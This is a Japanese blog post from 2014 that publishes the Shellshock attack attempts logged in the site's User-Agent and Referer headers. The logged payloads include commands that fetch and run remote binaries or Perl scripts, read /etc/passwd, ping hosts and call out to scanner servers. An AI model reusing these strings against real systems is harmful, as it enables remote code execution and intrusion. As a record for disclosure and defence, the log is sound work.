cNotesサイトへのアクセスログ(shellshock)
Published: 2014/10/04
cNotes サイトに記録されていた shellshock 問題へのアクセスログです。日時は、アクセスパタンの初出です。
Uesr-Agent に格納されていた shellshock 問題へのアクセス
2014-09-26T17:37:53 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html), () { :; }; /usr/bin/wget web5.mooo.com/bashvultest 2014-09-26T22:04:55 () { :;}; /usr/bin/wget http://web5.mooo.com/bashvultest
2014-09-27T07:23:07 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-wget 2014-09-27T07:23:07 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-curl 2014-09-27T07:23:07 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-local-bin-wget 2014-09-27T07:23:08 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-bin-wget 2014-09-27T07:23:08 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-wget' 2014-09-27T07:23:09 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-curl' 2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-local-bin-wget' 2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-bin-wget' 2014-09-27T17:43:21 () { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z xxx.xxx.xxx.xxx/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\" 2014-09-27T23:51:00 () { foo;};echo;/bin/cat /etc/passwd
2014-09-28T00:15:47 () { 1;}; echo -e \header:kbash-scaned2\"" 2014-09-28T00:17:39 () { foo;};echo;/sbin/ifconfig
2014-09-29T03:39:19 () { :;}; /bin/bash -c \"cd /tmp;wget http://xxx.xxx.xxx.xxx/ji;curl -O /tmp/ji http://xxx.xxx.xxx.xxx/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\" 2014-09-29T07:01:07 () { :;}; /bin/bash -c \"wget http://xxx.xxx.xxx.xxx/bash-count.txt\" 2014-09-29T11:56:25 () { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a
2014-09-30T07:54:07 () { :; }; echo Content-Type:text/plain; echo ; echo VULN-VULN-VULN-BASH-CGI 2014-09-30T18:12:22 () { :; }; echo; echo `echo '>>>asdf'; echo fuckasdf;echo '<<<asdf'` 2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;
Referer に格納されていた shellshock 問題へのアクセス
2014-09-25T06:18:05 () { :; }; ping -c 11 xxx.xxx.xxx.xxx
2014-09-27T07:23:39 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-wget 2014-09-27T07:23:40 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-curl 2014-09-27T07:23:46 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-local-bin-wget 2014-09-27T07:23:46 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-bin-wget 2014-09-27T07:23:47 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-wget' 2014-09-27T07:23:47 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-curl' 2014-09-27T07:23:47 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-local-bin-wget' 2014-09-27T07:23:48 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-bin-wget'
2014-09-28T13:19:03 () { :;}; echo 'Shellshock: Vulnerable'
2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;
@Sam